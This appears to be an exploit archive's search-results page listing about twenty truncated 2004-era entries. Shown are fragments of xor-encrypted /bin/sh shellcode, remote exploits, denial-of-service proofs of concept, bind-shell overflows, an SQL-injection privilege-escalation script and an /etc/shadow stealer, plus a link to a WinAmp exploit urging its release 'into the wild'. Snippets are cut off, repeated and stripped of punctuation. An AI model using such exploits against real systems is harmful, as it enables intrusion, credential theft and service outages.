2058 matches found
linux/x86 execve /bin/sh xor encrypted 55 bytes
No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...
CitadelUX 6.23 - Remote USER Directive
CitadelUX 6.23 - Remote USER Directive / Citadel/UX remote exploit By nebunu: pppppppal at yahoo dot com This is the version which contains targets,abuse it kiddies Bruteforce: You only have 4096/4=1024 tries. The magic offset lies about 2048 + or - 4,8,16....256 So practically speaking you have...
CesarFTP Server - Long Command Denial of Service
/ ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date : 2004-08-30...
Easy File Sharing Webserver 1.25 Denial of Service Exploit
No description provided by source. Easy File Sharing Webserver v1.25 Denial Of Service Proof Of Concept Code By GulfTech Security Research Easy File Sharing Webserver v1.25 will consume 99% of CPU usage until it crashes when sent large req's use IO::Socket; print...
Painkiller 1.3.1 - Denial of Service
Painkiller 1.3.1 - Denial of Service / by Luigi Auriemma / include include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include endif define VER "0.1" define BUFFSZ 2048 define PORT 3455 define TIMEOUT 3 define GAMEVER "1.3" define...
Gaucho 1.4 - Mail Client Buffer Overflow
Gaucho 1.4 - Mail Client Buffer Overflow // // Gaucho Ver 1.4 Mail Client Buffer Overflow Vulnerability // Bind Shell POC Validation Code for English Win2K SP4 // 10 Aug 2004 // // Gaucho is an Email client developed by NakedSoft for Microsoft Windows // platforms. Gaucho supports SMTP, POP3 and...
WinAmp => 5.04 XML Remote Code exec
hello.. security.nnov.ru team i just coded an exploit to the WinAmp = 5.04 XML Remote Code exec bug if you like.. check The exploit http://blackhat.tv/skinhead.tgz a readme http://blackhat.tv/skinhead/README a working sample http://blackhat.tv/skinhead/ let it go out to the wild! greetings Daniel...
Gaucho 1.4 - Mail Client Buffer Overflow
// // Gaucho Ver 1.4 Mail Client Buffer Overflow Vulnerability // Bind Shell POC Validation Code for English Win2K SP4 // 10 Aug 2004 // // Gaucho is an Email client developed by NakedSoft for Microsoft Windows // platforms. Gaucho supports SMTP, POP3 and other email delivery protocols. // Gaucho...
BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit
No description provided by source. !/usr/bin/perl BadBlue v2.52 Web Server - Multiple Connections DoS POC Code BadBlue Web Server can not handle many simultaneous connects from the same host, and will lock up until the connects stop This Proof Of Concept Written By GulfTech Security Research use...
BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit
Exploit for unknown platform in category dos / poc ====================================================================== BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit ====================================================================== !/usr/bin/perl BadBlue v2.52 Web...
RealVNC Server 4.0 - Remote Denial of Service
RealVNC Server 4.0 - Remote Denial of Service // source: https://www.securityfocus.com/bid/11048/info RealVNC server is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker establishes a large amount connections to the server. This issue was...
Hafiye 1.0 Remote Terminal Escape Sequence Injection Vulnerability
Exploit for linux platform in category remote exploits ================================================================== Hafiye 1.0 Remote Terminal Escape Sequence Injection Vulnerability ================================================================== / Remote Exploit for Hafiye-1.0 Terminal...
MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer
Exploit for linux platform in category remote exploits ========================================================== MusicDaemon Hello ...... bin::9797:0::::: ftp::9797:0::::: sshd::9797:0::::: ...... email protected:/test Server Side View: email protected:/test/musicdaemon-0.0.3/src ./musicd -c...
MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer
No description provided by source. / MusicDaemon = 0.0.3 v2 Remote /etc/shadow Stealer / DoS Vulnerability discovered by: Tal0n 05-22-04 Exploit code by: Tal0n 05-22-04 Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz, serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky,...
phpMyWebhosting - SQL Injection
phpMyWebhosting - SQL Injection !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to...
phpMyWebhosting SQL Injection Exploit
Exploit for unknown platform in category web applications ===================================== phpMyWebhosting SQL Injection Exploit ===================================== !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and...
phpMyWebhosting SQL Injection Exploit
No description provided by source. !/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to...
phpMyWebhosting - SQL Injection
!/usr/bin/perl Exploit code by Noam Rathaus of Beyond Security Ltd. The following exploit code will use a valid username and password combination, to cause an SQL injection. Using the SQL injection, the Perl script elevates the privileges of the user provided to administrative. use IO::Socket; us...
XV 3.x - '.BMP' Parsing Local Buffer Overflow
/ xv exploit for the bmp parsing buffer overflow infamous42md AT hotpop DOT com PEOPLE STOP EMAILING MY BUGTRAQ ADDRESS AND USE THIS ONE!! n00batlocalho.outernet gcc -Wall xvbmpslap.c n00batlocalho.outernet ./a.out Usage: ./a.out align n00batlocalho.outernet ./a.out 0xbffff388...
IPD (Integrity Protection Driver) - Denial of Service
IPD Integrity Protection Driver - Denial of Service / ipd-dos.c Copyright c 2002-2004 By Next Generation Security S.L. All rights reserved Compiles with: cl ipd-dos.c Madrid, August 2004 / include define MYNULL 0x01 typedef DWORD zwopensectionTYPEDWORD Handle, DWORD mask, DWORD oa; int mainint...